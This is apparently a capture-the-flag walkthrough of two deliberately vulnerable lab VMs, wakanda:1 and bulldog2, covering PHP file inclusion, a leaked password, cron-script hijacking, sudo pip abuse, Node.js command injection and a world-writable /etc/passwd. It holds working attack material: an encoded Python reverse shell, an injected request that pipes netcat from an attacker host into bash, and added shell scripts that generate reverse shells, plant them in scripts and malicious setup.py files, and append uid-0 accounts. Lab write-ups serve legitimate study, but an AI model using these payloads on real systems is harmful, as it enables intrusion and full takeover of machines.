Vulnerable VM walkthroughs (wakanda, bulldog2)

wakanda:1

Setup and introduction

https://www.vulnhub.com/entry/wakanda-1,251/

IP and ports

Target IP: 192.168.1.102. Port scan: [screenshot]

Getting a shell

Start with port 80: the site has nothing interactive [screenshot]. A dirb scan [screenshot] returns only hits of size 0, so there is no foothold there. Going back to the page source, there is one commented-out line:

<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->

Requesting ?lang=fr gives a different page [screenshot], which suggests the parameter is a file include. Checking whether fr.php exists on the server confirms it [screenshot]. Test for local file inclusion by reading the source of index.php through the php://filter wrapper (the include appends .php, so the resource is named without its extension):

root@kali:/home/blacsheep# curl "http://192.168.1.102/?lang=php://filter/read=convert.base64-encode/resource=index" | base64 -d
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  3815  100  3815    0     0  3725k      0 --:--:-- --:--:-- --:--:-- 3725k
<?php
$password ="Niamey4Ever227!!!" ;//I have to remember it

if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}

?>



<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="Vibranium market">
<meta name="author" content="mamadou">

<title>Vibranium Market</title>


<link href="bootstrap.css" rel="stylesheet">


<link href="cover.css" rel="stylesheet">
</head>

<body class="text-center">

<div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
<header class="masthead mb-auto">
<div class="inner">
<h3 class="masthead-brand">Vibranium Market</h3>
<nav class="nav nav-masthead justify-content-center">
<a class="nav-link active" href="#">Home</a>
<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
</nav>
</div>
</header>

<main role="main" class="inner cover">
<h1 class="cover-heading">Coming soon</h1>
<p class="lead">
<?php
if (isset($_GET['lang']))
{
echo $message;
}
else
{
?>

Next opening of the largest vibranium market. The products come directly from the wakanda. stay tuned!
<?php
}
?>
</p>
<p class="lead">
<a href="#" class="btn btn-lg btn-secondary">Learn more</a>
</p>
</main>

<footer class="mastfoot mt-auto">
<div class="inner">
<p>Made by<a href="#">@mamadou</a></p>
</div>
</footer>
</div>
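As an added example (not part of the original post), a small shell helper for the php://filter source-disclosure step above: it builds the filter URL for a given file, decodes the base64 body, and pulls the hard-coded $password out of the PHP. The target base URL is the one from the walkthrough; the sample base64 is constructed inline from the password line shown above so the extraction can be exercised without the VM.

```shell
#!/bin/sh
# Added example (not from the original post): read PHP source through the
# ?lang= include using the php://filter wrapper, then pull the hard-coded
# password out of the decoded file. Target URL and file names are assumptions.

# Build the php://filter URL. The include() appends ".php", so the resource
# is given without its extension; only .php files are reachable this way
# (/etc/passwd, for instance, is not, because "/etc/passwd.php" does not exist).
lfi_url() {
    base="$1"   # e.g. http://192.168.1.102
    file="$2"   # e.g. index  (becomes index.php on the server)
    printf '%s/?lang=php://filter/read=convert.base64-encode/resource=%s\n' "$base" "$file"
}

# Extract the value assigned to $password from base64-encoded PHP source.
php_password_from_b64() {
    printf '%s' "$1" | base64 -d | sed -n 's/.*\$password *= *"\([^"]*\)".*/\1/p' | head -n 1
}

# Fetch and decode one file from a live target (needs network; not run by the test).
dump_source() {
    curl -s "$(lfi_url "$1" "$2")" | base64 -d
}

# Constructed sample: the relevant lines of index.php as the walkthrough shows them.
SAMPLE_B64=$(printf '%s\n' '<?php' '$password ="Niamey4Ever227!!!" ;//I have to remember it' | base64)

# Live usage:  dump_source http://192.168.1.102 index
#              dump_source http://192.168.1.102 fr
```

Because the filter returns the file base64-encoded rather than executed, the same trick works for any .php file whose name you can guess (fr.php here), which is how the credential below was found without code execution.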

That is a hard-coded password; try it over SSH with the username mamadou from the page's author meta tag [screenshot]. It logs in [screenshot], and we are the user mamadou [screenshot].

Privilege escalation

Check sudo -l first:

mamadou@Wakanda1:~$ sudo -l
[sudo] password for mamadou:
Sorry, user mamadou may not run sudo on Wakanda1.

mamadou has no sudo rights. Looking for leads, /etc/passwd lists a devops user; find the files it owns:

mamadou@Wakanda1:~$ find / -user devops 2>/dev/null
/srv/.antivirus.py

One Python file; look at its contents:

open('/tmp/test','w').write('test')

This looks like a script that is run automatically as devops (at boot or on a schedule), so check whether we can modify it:

mamadou@Wakanda1:/srv$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Aug 1 17:52 .
drwxr-xr-x 22 root root 4096 Aug 1 13:05 ..
-rw-r--rw- 1 devops developer 446 Sep 16 08:41 .antivirus.py

The mode -rw-r--rw- gives every other user write access, so we can write a reverse shell straight into it. Generate one with msfvenom:

root@kali:/home/blacsheep# msfvenom -p cmd/unix/reverse_python lhost=192.168.1.105 lport=4445 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 497 bytes
python -c "exec('aW1wb3J0IHNvY2tldCAgICwgIHN1YnByb2Nlc3MgICAsICBvcyAgICAgOyAgICAgaG9zdD0iMTkyLjE2OC4xLjEwNSIgICAgIDsgICAgIHBvcnQ9NDQ0NSAgICAgOyAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgLCAgc29ja2V0LlNPQ0tfU1RSRUFNKSAgICAgOyAgICAgcy5jb25uZWN0KChob3N0ICAgLCAgcG9ydCkpICAgICA7ICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAwKSAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgMSkgICAgIDsgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICwgIDIpICAgICA7ICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"

Write the exec(...) part into the file (without the python -c wrapper, since the file is already run by python), start a listener locally and reboot the target [screenshot]. The shell comes back as devops [screenshot]; run sudo -l again:

devops@Wakanda1:/$ sudo -l
Matching Defaults entries for devops on Wakanda1:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User devops may run the following commands on Wakanda1:
(ALL) NOPASSWD: /usr/bin/pip

devops can run pip as root without a password. There is a known trick for this: FakePip (https://github.com/0x00-0x00/FakePip) gives a reverse shell from a malicious package, because pip executes the package's setup.py with the privileges of the user running it. Clone it, change the IP, and write a small webshell into /tmp on the target to make transferring the files easier [screenshot]. Start a listener, then as devops run:

sudo -u root /usr/bin/pip install . --upgrade --force-reinstall

The reverse shell arrives on port 443 [screenshot].
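Both escalation steps on this box plant the same thing, a Python reverse shell, somewhere another user will execute it: first in the world-writable /srv/.antivirus.py that devops runs, then in a setup.py that root runs through sudo pip. The added example below (my own code, not FakePip's and not from the original post) writes that snippet once and reuses it for both steps; the listener address and the file paths are assumptions. It also sidesteps a portability problem in the msfvenom payload above: its exec('...'.decode('base64')) form only works on Python 2, because str has no .decode() in Python 3, so if the script happens to be run by python3 the callback never happens.

```shell
#!/bin/sh
# Added example (not FakePip's code and not from the original post): one
# reverse-shell snippet reused for both escalation steps on Wakanda, with the
# listener address and file paths as assumptions.
#   1. mamadou -> devops: overwrite the world-writable /srv/.antivirus.py
#   2. devops  -> root:   a package whose setup.py runs when root does
#                         `sudo pip install .`
# Plain code instead of msfvenom's exec('...'.decode('base64')) so it runs
# under either Python 2 or Python 3.

reverse_shell_py() {
    host="$1"; port="$2"
    cat <<EOF
import os, socket, subprocess
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("$host", $port))
for fd in (0, 1, 2):          # wire stdin/stdout/stderr to the socket
    os.dup2(s.fileno(), fd)
subprocess.call(["/bin/bash", "-i"])
EOF
}

# Step 1: replace the script devops runs with the reverse shell. /srv itself is
# root-owned, so the backup copy goes to /tmp for restoring afterwards.
plant_script_payload() {
    target="$1"; host="$2"; port="$3"
    [ -w "$target" ] || { echo "not writable: $target" >&2; return 1; }
    cp "$target" "/tmp/$(basename "$target").orig"
    reverse_shell_py "$host" "$port" > "$target"
}

# Step 2: build a minimal package. pip imports setup.py as the invoking user,
# so everything before setup() executes as root under sudo.
make_fake_package() {
    dir="$1"; host="$2"; port="$3"
    mkdir -p "$dir"
    {
        echo 'from setuptools import setup'
        reverse_shell_py "$host" "$port"
        echo 'setup(name="fakepip", version="0.1")'
    } > "$dir/setup.py"
    echo "$dir/setup.py"
}

# Usage on the box (listener already running with  nc -lvnp 443  on 192.168.1.105):
#   plant_script_payload /srv/.antivirus.py 192.168.1.105 4445
#   cd "$(dirname "$(make_fake_package /tmp/fakepip 192.168.1.105 443)")"
#   sudo -u root /usr/bin/pip install . --upgrade --force-reinstall
```

The --force-reinstall flag matters for a second attempt: without it pip may decide the package is already installed and never import setup.py again.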

bulldog2

Introduction and download

https://www.vulnhub.com/entry/bulldog-2,246/

IP and ports

Target IP: 192.168.43.121. Port scan [screenshot]: only port 80 is open.

Further enumeration

With only 80 open, look at the web app [screenshot]. Poking at it shows almost no functionality, and registration is disabled. Later, trying injection on a user profile page returned an error page; the URL requested was:

http://192.168.43.121/profile/lrberna%df'

[screenshot] The error reveals the backend is Node.js, and the web directory names include the string Bulldog-2-The-Reckoning. A GitHub search for it finds the original repository, https://github.com/Frichetten/Bulldog-2-The-Reckoning [screenshot], so we can move on to source review.

Getting a shell

When reading web code I start with the router, since it lays out the site's functionality. Right at the top of the router:

const {exec} = require('child_process');

A ctrl+F for exec finds the key code [screenshot]: the /users/linkauthenticate handler passes request input into exec(), i.e. a command injection. Capture a request in Burp, change it to a POST to that path and add the injected command; the Content-type: application/json header is required. Confirm with a ping while running tcpdump -nni wlan0 icmp locally [screenshot]; the echo requests arrive. A direct reverse shell should have worked at this point but did not for some reason, probably special characters, so the workaround is a two-stage payload: the injected command makes nc connect back and pipe whatever it receives into bash, and the actual reverse shell command is then typed into that nc listener. The final request:

POST /users/linkauthenticate HTTP/1.1
Host: 192.168.43.121
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/json;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
If-None-Match: W/"465-1649e73083e"
If-Modified-Since: Sun, 15 Jul 2018 14:58:16 GMT
Connection: close
Content-type: application/json
Content-Length: 77

{
"username": "123",
"password": ";nc 192.168.43.245 6712 | /bin/bash"
}

And we have a shell [screenshot].

Privilege escalation

We have no user passwords, but the box may have a local misconfiguration that allows escalation:

node@bulldog2:/var/www/node/Bulldog-2-The-Reckoning$ ls -l /etc | grep passwd
-rwxrwxrwx 1 root root 1728 Sep 17 04:46 passwd
-rw-r--r-- 1 root root 1650 Jul 15 04:06 passwd-

/etc/passwd is world-writable (-rwxrwxrwx), so we can simply append a new user with uid 0. Generate a password hash with openssl:

node@bulldog2:/var/www/node/Bulldog-2-The-Reckoning$ openssl passwd -1 -salt cnss blacsheep
$1$cnss$LUsyAIs8qkoK/EBDFmYs61

Build the new passwd entry (uid 0, gid 0):

blacsheep:$1$cnss$LUsyAIs8qkoK/EBDFmYs61:0:0:,,,:/home/node:/bin/bash

Then append it to /etc/passwd:

echo "blacsheep:\$1\$cnss\$LUsyAIs8qkoK/EBDFmYs61:0:0:,,,:/home/node:/bin/bash">>/etc/passwd

Note that the $ characters are escaped with \ because the string is double-quoted; otherwise the shell would expand $1 and $cnss and corrupt the hash. Switching to that user gives root [screenshot].
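The same step as a small set of shell functions, added here as an example and not taken from the original post: hash generation with openssl, construction of the seven-field entry, and an append that checks writability and rejects a duplicate name before touching the file. Single-quoting the hash argument is what removes the $-escaping problem noted above. The password and salt in the usage line are placeholders; the hash value on the page is the author's.

```shell
#!/bin/sh
# Added example (not from the original post): abuse a world-writable
# /etc/passwd without the $-escaping trap. Password and salt are placeholders.

# MD5-crypt ($1$) as in the walkthrough. Any current glibc also accepts -6
# (SHA-512 crypt), which is the better choice when the target supports it.
crypt_hash() {
    openssl passwd -1 -salt "$2" "$1"
}

# Seven fields: name:hash:uid:gid:gecos:home:shell. uid 0 is what makes the
# account root; the name only has to be unique.
passwd_line() {
    printf '%s:%s:0:0:,,,:/home/node:/bin/bash\n' "$1" "$2"
}

# Append the entry, but only if the file is writable and the name is free.
# The hash arrives as a quoted argument, so '$' is never seen by the shell.
add_root_user() {
    file="${3:-/etc/passwd}"
    [ -w "$file" ] || { echo "$file is not writable" >&2; return 1; }
    grep -q "^$1:" "$file" && { echo "$1 already exists in $file" >&2; return 1; }
    passwd_line "$1" "$2" >> "$file"
}

# Usage:  add_root_user blacsheep "$(crypt_hash blacsheep cnss)"   # placeholder password
#         su blacsheep
```

A hash in the second field of /etc/passwd overrides the `x` that normally defers to /etc/shadow, which is why no shadow entry is needed for the new account to log in.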